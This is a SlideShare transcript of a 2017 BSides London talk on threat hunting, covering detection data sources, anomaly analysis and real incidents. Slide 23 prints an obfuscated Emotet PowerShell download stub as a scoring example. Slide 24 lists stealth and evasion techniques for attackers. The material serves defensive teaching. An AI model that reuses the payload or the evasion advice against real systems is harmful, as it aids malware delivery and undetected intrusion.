Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

BSides London 2017 - Hunt Or Be Hunted

942 views

Published on

Over the last few years threat hunting has risen from being a grassroots hands-on defensive technique to all-out hype as security vendors have jumped on the bandwagon. In this talk I wanted to strip away the marketing and talk about real-life threat hunting at scale and how it differs from traditional security monitoring. I'll cover the key datasets, different analytical approaches, cutting-edge TTPs and the people/skills needed to make it happen. I'll also share some real-world compromises that would have been missed by traditional detection but were found through hands-on threat hunting.

Published in: Technology
  • Be the first to comment

BSides London 2017 - Hunt Or Be Hunted

  1. 1. HUNT OR BE HUNTED 7th June 2017
  2. 2. • Senior Threat Hunter @ Countercept • Pentester + Defensive fanboi • Bug Bounty Lover <3 • Blogger? @pwndizzle WHOAMI
  3. 3. Threat hunting when you don’t know you’re threat hunting…
  4. 4. “THE PROCESS OF PROACTIVELY AND ITERATIVELY SEARCHING THROUGH NETWORKS TO DETECT AND ISOLATE ADVANCED THREATS THAT EVADE EXISTING SECURITY SOLUTIONS” - SQRRL What is threat hunting?
  5. 5. Manual Alerts from “products” (AV) Semi-AutomatedFully Automated Manual Threat Hunting Assisted Hunts Vuln Scanners (Nessus) Manual Pentesting Tools (nmap) Advanced Threat Hunting Traditional security teams Manual vs Automated OFFENCE DEFENCE
  6. 6. TacticalThreatIntel 10% 40% 80% 99% AUTOMATED NOTIFICATION AUTOMATION Capability ‘HUNTING USE CASE’ GENERATION (HYPOTHESIS) ‘HUNTING USE CASE’ EXECUTION The Paris Model (or Hunting Rocket, or APT Eiffel Tower)
  7. 7. Process • Red team use-case: HTA w/PS payload • Manual hunt: mshta.exe usage, PS script logging • Automated hunt: suspicious processes/script analysis • Refine automation (increase fidelity): Filtering/Enrichment Requirements • People: someone needs to know this technique, understand it enough to search and automate • Tech: endpoint visibility required + automated analysis framework. Paris Model In Action
  8. 8. Where do I start?
  9. 9. What data sources?
  10. 10. Payload executed Data exfiltrated Persistence installed Escalated Privs Lateral movement Payload delivered • Email Filter • Web Proxy • Bro Logs • Firewall • Endpoint • Windows/Linux logs • AV logs • Bro Logs • Web Proxy • App Logs
  11. 11. How to do analysis?
  12. 12. IOCs are bad* *If you rely on IOCs as your primary detection technique
  13. 13. Specific Attacker TTPs • Anomaly or context driven • Windows – Logins, DCSync, PrivEsc, Lockouts • Binaries • Execution – cmd, ps, wscript, wmi • Enumeration - net • Persistence – schtasks, services, registry, cron • In-Memory injection • Privilege Escalation • UAC Bypass Endpoint Logs Network • Domain classification/history/age • File analysis - Extension, Content- type, Content, Mismatches • Data Transfers – Uploads/Downloads • Dynamic DNS usage • DNS Tunneling
  14. 14. In-Memory Injection Detection • Suspicious threads • Unknown module • Unusual Permissions (e.g. RWX) • Check for MZ • Check for PE Header • Check for MS-DOS strings Injection Techniques • LoadLibrary • Process Hollowing • Reflective Loading • Hooking Advanced Attack Detection @ Securitay2017 - https://youtu.be/ihElrBBJQo8
  15. 15. Least Frequency Analysis/Stacking Frequency Count Highest Frequency Process Name Count conhost.exe 11730618 cscript.exe 9819507 cmd.exe 1497875 WmiPrvSE.exe 1444628 dllhost.exe 579741 Lowest Frequency Process Name Count hpzpsl01.exe 1 ismagent.exe 1 MSIAE02.tmp 1 dJK4oMMtx.exe 1 SketchUp.exe 1 Anomalies That’s a bit weird
  16. 16. Relationships/Graphing
  17. 17. Clustering/Behaviour Based Detection https://countercept.com/our-thinking/machine-learning/
  18. 18. Automation
  19. 19. Efficiency is intelligent laziness
  20. 20. Speeding it up • Data analysis with scoring/rules (“Assisted Hunts”) • Enrichment/Context • Integrated prevention/response • Ticketing – Creation, Updating, Closing • Payload Analysis – VT and Cuckoo integration, IDA/Radare plugins • Comms with other users/clients (https://github.com/dropbox/securitybot)
  21. 21. Welcome to the real world…
  22. 22. • Targeting ATM management systems! :O Example #1 – Don’t trust your admins • Lateral movement using “Advanced IP Scanner” • History of deployment, 1 host, 5 hosts, 27 hosts. • Compiled Python binary with key-logging capabilities • Suspicious executable bstack.exe running from StartUp folder
  23. 23. Example #2 – Emotet - Macros+Powershell <3 Scoring • Hidden Window (3/10) • WebClient Download File (10/10) • URL in args (7/10) • Start-Process (8/10) • Network comms/File writes (9/10) IEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115- 101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51- 93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97- 104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39- 110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m3 9_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70- 45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32- 32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43- 39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98- 103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98- 39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48- 116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72- 39_43t39V45m39t43Q39_101Q98}103_48- 32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98- 39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115 _101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]$_ -AS [Char]) } ) -Join'' ) • IEX (9/10) • Letter/Number/Special Char Ratios (8/10) • Decoder Stub (7/10) • Length (8/10) https://github.com/danielbohannon/Invoke-Obfuscation
  24. 24. How to be a stealthier attacker Foothold Execution Persistence C2/Exfil • Avoid SysInternals Autoruns - Scheduled Tasks, Services, Registry, Cron, Launch Daemons/Agents • WMI and COM not perfect but better than others • Use “hide in plain sight” techniques • Outlook rules, Office templates • DLL side-loading • Rootkits • Anything involving custom applications • Don’t use persistence if you don’t need to! • Avoid network comms from processes which don’t have network comms • Avoid newly registered domains, if possible use Google/Twitter/Youtube etc. • Avoid DNS tunneling • Use SSL and outlook/browsers where possible and go low and slow • Avoid new processes and avoid using command line arguments • Avoid Windows utilities – cmd, powershell, net, reg, etc. • Avoid in-memory techniques • Avoid “hacker tools” – Metasploit, CobaltStrike, Mimikatz • Avoid “spraying” credentials • WMI is a better option • Use direct Windows API access where possible • Modify tools/binaries – name, hash, description • Avoid macros/hta files • Social engineering, exploits, webapps are better • Abuse third party services Facebook/Linkedin • Target personal assets instead of corporate assets
  25. 25. • Data – OSQuery, GRR, Sysmon, Bro, Event logs • Storage – Elastic • Analytics - ElasticDSL, Kibana, ElastAlert, 411 • Infrastructure – Puppet, Chef, Ansible, Docker DIY Detection
  26. 26. But what about CVE-2017-0144?! Blue is the new red…
  27. 27. QUESTIONS?

×